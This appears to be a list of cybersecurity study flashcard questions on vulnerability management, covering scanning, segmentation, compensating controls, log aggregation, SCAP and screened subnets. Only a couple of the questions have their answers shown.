Scanners look for signatures in application scans, web application scans, and network scans.
What are the environmental variables in vulnerability analysis?
What is the impact of industry/organization on vulnerabilities?
What is risk tolerance in security?
What does cybersecurity insurance cover?
What is segmentation in security?
What is the purpose of logical segmentation with VLANs?
What are compensating controls?
Why is security monitoring essential?
What does log aggregation enable?
What is crucial in a constantly changing threat landscape?
What should be actively checked in systems?
What is the average time to identify and contain a breach?
About 9 months (IBM security report, 2022)
What is an exception in vulnerability management?
What is required after a vulnerability is patched?
What is essential for ongoing vulnerability management?
What is the purpose of alert tuning?
What is SCAP used for?
How can SCAP content be utilized?
What are some types of automation in SCAP?
What is the purpose of a screened subnet?
Provides an additional layer of security between the network and the Internet